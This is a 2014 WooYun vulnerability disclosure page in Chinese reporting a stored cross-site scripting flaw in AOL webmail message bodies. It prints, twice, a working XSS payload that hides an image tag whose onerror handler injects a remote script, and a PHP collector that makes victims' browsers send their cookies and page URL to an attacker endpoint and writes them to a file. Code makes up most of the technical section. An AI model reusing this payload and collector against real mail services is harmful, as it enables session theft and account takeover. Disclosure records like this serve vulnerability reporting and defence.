当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-079564

漏洞标题:美国在线邮箱正文存储型xss可盲打(各种技巧第一弹)

相关厂商:美国在线

漏洞作者: 农村教师

提交时间:2014-10-16 10:15

修复时间:2014-11-30 10:24

公开时间:2014-11-30 10:24

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-10-16: 细节已通知厂商并且等待厂商处理中
2014-10-20: 厂商已经确认,细节仅向厂商公开
2014-10-30: 细节向核心白帽子及相关领域专家公开
2014-11-09: 细节向普通白帽子公开
2014-11-19: 细节向实习白帽子公开
2014-11-30: 细节向公众公开

简要描述:

美国在线邮箱正文存储型xss可盲打!各种猥琐第一弹!影响版本ie6-10

详细说明:

美国在线邮箱正文存储型xss可盲打!各种猥琐第一弹!影响版本ie6-10
xss代码:

<div style="display:none"><img title="with(top.document)body.appendChild(createElement('script')).src='http://127.0.0.1/aol.php?mail=aol'" style="&amp;#38;quot; onerror=eval(this.title) src=x"></div>


收信代码:

<?php
echo "new Image().src='http://127.0.0.1/aol.php?mail=aol&cookie='+escape(document.cookie)+'&url='+escape(top.document.location.href);";
$mail=get('mail');
$cookie=get('cookie');
$url=get('url');
file_put_contents('aol.txt',$mail."\r\n".$cookie."\r\n".$url);
function get($get){ //get转义函数
$val = !empty($_GET[$get]) ? $_GET[$get] : null;
return $val;
}
?>


例子:

QQ截图20141016081450.jpg


xss:

QQ截图20141016081552.jpg


漏洞证明:

美国在线邮箱正文存储型xss可盲打!各种猥琐第一弹!影响版本ie6-10
xss代码:

<div style="display:none"><img title="with(top.document)body.appendChild(createElement('script')).src='http://127.0.0.1/aol.php?mail=aol'" style="&amp;#38;quot; onerror=eval(this.title) src=x"></div>


收信代码:

<?php
echo "new Image().src='http://127.0.0.1/aol.php?mail=aol&cookie='+escape(document.cookie)+'&url='+escape(top.document.location.href);";
$mail=get('mail');
$cookie=get('cookie');
$url=get('url');
file_put_contents('aol.txt',$mail."\r\n".$cookie."\r\n".$url);
function get($get){ //get转义函数
$val = !empty($_GET[$get]) ? $_GET[$get] : null;
return $val;
}
?>


例子:

QQ截图20141016081450.jpg


xss:

QQ截图20141016081552.jpg

修复方案:

各种过滤希望老外重视不然没挖洞的激情啊

版权声明:转载请注明来源 农村教师@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2014-10-20 10:04

厂商回复:

最新状态:

暂无